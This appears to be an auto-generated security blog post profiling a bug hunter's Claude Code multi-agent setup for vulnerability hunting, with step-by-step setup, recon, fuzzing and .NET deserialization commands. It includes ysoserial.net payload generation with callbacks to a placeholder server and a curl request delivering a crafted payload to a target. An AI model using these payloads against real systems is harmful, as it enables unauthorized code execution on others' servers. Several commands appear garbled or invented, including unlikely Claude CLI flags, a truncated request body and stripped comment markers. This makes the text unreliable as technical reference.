Listen to this Post

Introduction:
The bug bounty landscape is undergoing a seismic shift as elite hunters transition from hands-on keyboard operators to strategic directors orchestrating AI-powered multi-agent systems. French hacker Amel Bouziane-Leblond, known as Icare, has built an Iron Man-inspired Claude Code setup named “Jarvis” that self-provisions environments, manages dependencies, and runs parallel audit agents—yet he insists every finding still requires human validation before submission. This evolution raises critical questions about the future role of human judgment in vulnerability research and the emerging hybrid workflows that combine artificial intelligence with expert reasoning.
Learning Objectives:
- Understand how to design and deploy a self-managing multi-agent system for bug bounty automation using Claude Code and OpenClaw frameworks
- Master the integration of reconnaissance tools (subfinder, nuclei, ffuf) with AI-driven analysis for accelerated vulnerability discovery
- Learn to implement custom AI skills and automated skill libraries that evolve with emerging threat intelligence
- Develop practical commands and configurations for Linux/Windows environments to operationalize autonomous security testing
- Recognize the critical balance between automation and human validation in maintaining report quality and triage efficiency
You Should Know:
- Building a Self-Managing Multi-Agent System: The Jarvis Architecture
Icare’s setup represents a fundamental departure from traditional LLM-assisted hacking. Rather than using AI as an interactive pair—ask a question, get an answer—he treats Claude Code as a self-sustaining operator that runs on a dedicated VPS. The system self-provisions its environment, installs and updates tools on demand (subfinder, nuclei, ffuf, decompilers, custom fuzzers), manages its own Python and Node dependencies, and maintains long-running audit jobs across sessions without requiring SSH intervention.
The multi-agent orchestration capability is transformative: Icare runs 5–6 Opus agents simultaneously on different attack angles of the same target while focusing on other tasks. Each agent operates with a specific role—static analysis, dynamic testing via SSH, report writing—and they collaborate through shared files. The OpenClaw multi-agent framework serves as the backbone, enabling cross-agent communication and task delegation.
Step-by-Step Guide to Deploying Your Own Jarvis-Style System:
Step 1: Provision a Dedicated VPS
bash
Deploy a Ubuntu 22.04 LTS VPS with at least 8GB RAM and 4 vCPUs
ssh root@your-vps-ip
apt update && apt upgrade -y
apt install -y python3 python3-pip nodejs npm git build-essential
[/bash]
Step 2: Install Claude Code CLI
bash
npm install -g @anthropic-ai/claude-code
Authenticate with your Anthropic API key
claude auth login
[/bash]
Step 3: Install OpenClaw Multi-Agent Framework
bash
git clone https://github.com/openclaw/openclaw.git
cd openclaw
npm install
Configure OpenClaw for multi-agent orchestration
cp .env.example .env
Edit .env with your API keys and agent configuration
[/bash]
Step 4: Configure Persistent Agent Workflows
Create agent role definitions in `~/.claude/agents/`:
bash
{
“agent_id”: “recon_agent”,
“role”: “reconnaissance”,
“tools”: [“subfinder”, “httpx”, “gau”],
“parallel”: true,
“output_dir”: “/workspace/recon”
}
[/bash]
Step 5: Enable Self-Management Automation
bash
Create a cron job for automatic tool updates
crontab -e
Add: 0 3 /usr/local/bin/update-pentest-tools.sh
[/bash]
Step 6: Launch Multi-Agent Audit
bash
Deploy agents against target
claude –agent orchestrator –target “example.com” \
–agents recon,static,dynamic,report \
–parallel 6 –workspace /workspace/audit-$(date +%Y%m%d)
[/bash]
- Reconnaissance and Analysis Pipeline: From Discovery to Exploitation
Icare integrates traditional reconnaissance tools with AI-driven analysis to collapse discovery phases dramatically. In one engagement against a .NET stack with zero documentation—the kind of program hunters typically scroll past—Jarvis reversed .NET assemblies, mapped the attack surface across server and clients, and identified 22 reportable issues in just a few hours of agent runtime. Solo, that audit would have taken over a week.
The most interesting finding was a .NET deserialization vulnerability leading to RCE on the server—the kind of bug you only catch when you can read through the binary and reason about type handling, not just fuzz the surface. This demonstrates that AI’s true value lies not just in finding bugs, but in killing bad leads early and saving hours of dead-end testing.
Essential Recon Commands for Automated Workflows:
Subdomain Discovery:
bash
Enumerate subdomains recursively
subfinder -d target.com -all -recursive -o subdomains.txt
Combine with HTTP probing
cat subdomains.txt | httpx -status-code -title -tech-detect -o live_hosts.txt
[/bash]
Parameter Discovery and Fuzzing:
bash
Extract URLs from historical data
gau target.com | grep -E “.js$|.css$” | sort -u > js_files.txt
Fuzz for hidden parameters and endpoints
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt \
-mc 200,204,301,302,403 -fc 404 -o fuzz_results.json
[/bash]
Vulnerability Scanning:
bash
Run Nuclei against all live hosts
nuclei -l live_hosts.txt -t ~/nuclei-templates/ \
-severity critical,high,medium -o nuclei_results.txt
Custom template execution for specific vulnerability classes
nuclei -target https://target.com -t deserialization/ -tags rce
[/bash]
AI-Enhanced Analysis:
bash
Pipe results to Claude for analysis
cat nuclei_results.txt | claude –prompt “Analyze these findings, prioritize by exploitability, and suggest PoC approaches”
[/bash]
3. Custom AI Skills and Automated Skill Libraries
Icare maintains a self-evolving skill library where Jarvis pulls in current vulnerability research, write-ups, and CVE post-mortems as they’re published, then drafts candidate skills for each vulnerability class—one per OWASP Top 10 category including injection, broken access control, SSRF, and cryptographic failures. Each skill comes with its own detection heuristics, payload patterns, and verification routines.
The biggest advantage is mission-mode operation: describe the target and objective, and Jarvis spins up numbered agents (Agent 10, 11, 12…), each with a specific role, they collaborate through shared files, and the hunter receives a synthesis they can act on.
Creating Custom Claude Code Skills:
Skill Directory Structure:
bash
~/.claude/skills/
├── owasp/
│ ├── injection.md
│ ├── broken_access.md
│ └── ssrf.md
├── deserialization/
│ ├── java_gadgets.md
│ └── dotnet_analysis.md
└── custom/
└── target_specific.yaml
[/bash]
Example Skill Definition (deserialization.md):
name: .NET Deserialization Analysis
description: Detect and exploit insecure deserialization in .NET applications
tools: [dnSpy, ysoserial.net, dotPeek]
triggers: [BinaryFormatter, LosFormatter, ObjectStateFormatter]
Detection Heuristics
1. Look for serialized data markers in HTTP requests
2. Identify BinaryFormatter patterns (base64 encoded streams)
3. Check for ViewState or session cookies containing serialized data
Payload Generation
Use ysoserial.net to generate BinaryFormatter payloads:
[/bash]
ysoserial.net -f BinaryFormatter -g ActivitySurrogateSelector -c “calc.exe”
Verification
– Send crafted payload to target endpoint
– Monitor for callback or out-of-band interaction
– Confirm code execution through response behavior
[/bash]
Automated Skill Updates:
bash
Script to pull latest CVEs and generate skills
!/bin/bash
curl -s “https://cve.circl.lu/api/last” | jq -r ‘.[] | .id’ | \
while read cve; do
claude –prompt “Analyze CVE $cve and generate a detection skill”
done > ~/.claude/skills/auto_generated/
[/bash]
4. .NET Deserialization Exploitation: From Discovery to RCE
The deserialization-to-RCE chain Icare discovered exemplifies how AI can surface deep architectural bugs that surface-level fuzzing will never catch. When Jarvis reversed the .NET assemblies, it identified type handling vulnerabilities that allowed crafted serialized objects to execute arbitrary code on the server.
Practical .NET Deserialization Exploitation Commands:
Linux Environment (using mono):
bash
Install mono for .NET payload generation
apt install -y mono-complete
Download ysoserial.net
wget https://github.com/pwntester/ysoserial.net/releases/download/v1.35/ysoserial.exe
Generate BinaryFormatter payload
mono ysoserial.exe -f BinaryFormatter -g ActivitySurrogateSelector -c “ping -c 3 your-callback-server.com” -o base64
Generate LosFormatter payload for ViewState exploitation
mono ysoserial.exe -f LosFormatter -g TextFormattingRunProperties -c “nslookup your-callback-server.com” -o base64
[/bash]
Windows Environment:
bash
Using PowerShell to generate payloads
Add-Type -AssemblyName System.Runtime.Serialization
$formatter = New-Object System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
$stream = New-Object System.IO.MemoryStream
$formatter.Serialize($stream, $payload)
[/bash]
Testing for Deserialization Vulnerabilities:
bash
Send crafted payload to target
curl -X POST https://target.com/api/endpoint \
-H “Content-Type: application/json” \
-d ‘{“data”:”
–proxy http://127.0.0.1:8080
Monitor for DNS callback (using Burp Collaborator or Interactsh)
interactsh-client -o dns_results.txt
[/bash]
5. The Human-in-the-Loop Imperative: Validation and Judgment
Despite the impressive automation, Icare echoes every interviewee in the series: every finding still needs human validation, and he always makes the final call before submission. The shift from operator to director raises the bar on judgment rather than lowering it. The deserialization-to-RCE chain only surfaces because someone knows why that bug class exists and can reason about type handling in the binary.
Validation Workflow Commands:
PoC Verification:
bash
Replay and verify each finding
for finding in findings/.json; do
python3 poc_verifier.py –finding $finding –target $TARGET
done
[/bash]
Report Quality Assessment:
bash
Check for hallucinated vulnerabilities
claude –prompt “Review these findings for technical accuracy and exploitability” < findings.json
Generate structured report with CVSS scoring
python3 report_generator.py –findings findings/ –template yeswehack_template.md
[/bash]
Duplicate Prevention:
bash
Search for existing reports on platform
python3 duplicate_checker.py –platform yeswehack –target $TARGET –finding “$FINDING”
[/bash]
What Undercode Say:
- Automation Scales Hands, Not Judgment: The defensive skill now lies in orchestrating agents and curating their output, not in spinning up the most agents. Judgment that separates a real chain from a plausible-looking dead end does not transfer to whoever deploys the most automation.
-
Human Validation Remains Non-1egotiable: Every finding still requires human validation before submission. The transition from operator to director raises the bar on judgment rather than lowering it—the human remains the final arbiter of every report.
-
AI’s True Value Is in Hypothesis Killing: Claude Opus invalidated three of five initial hypotheses in the first hour by walking code paths and showing missed guard clauses—saving hours of dead-end testing that would have otherwise vanished into unproductive work.
Prediction:
-
+1 The hunter-agent symbiosis will become the dominant bug bounty paradigm within 18-24 months, with top performers achieving 5-10x productivity gains through multi-agent orchestration while maintaining rigorous human validation standards.
-
-1 The flood of AI-generated “slop” submissions will force platforms to implement stricter validation mechanisms, potentially reducing acceptance rates for automated findings and increasing triage burden on security teams.
-
+1 Self-evolving skill libraries that ingest real-time CVE data will democratize advanced vulnerability research capabilities, enabling mid-tier hunters to compete with elite researchers on complex targets like thick-client applications and binary reversing.
-
-1 The increasing sophistication of autonomous red-team agents raises concerns about malicious use, as the same frameworks powering legitimate bug bounty automation could be weaponized by threat actors at scale.
-
+1 Organizations will increasingly integrate AI-powered continuous security testing into CI/CD pipelines, shifting bug bounty from reactive discovery to proactive prevention.
-
-1 The bar for entry into professional bug bounty hunting will rise significantly as hunters must master both traditional security skills and AI agent orchestration—potentially excluding those who cannot afford or adapt to the new tooling landscape.
-
+1 Platforms like YesWeHack will evolve to support agent-to-platform APIs, enabling direct integration between autonomous hunting frameworks and bounty platforms for streamlined submission workflows.
▶️ Related Video (80% Match):
https://www.youtube.com/watch?v=-x-BJEIvuoc
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Meet Jarvis – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


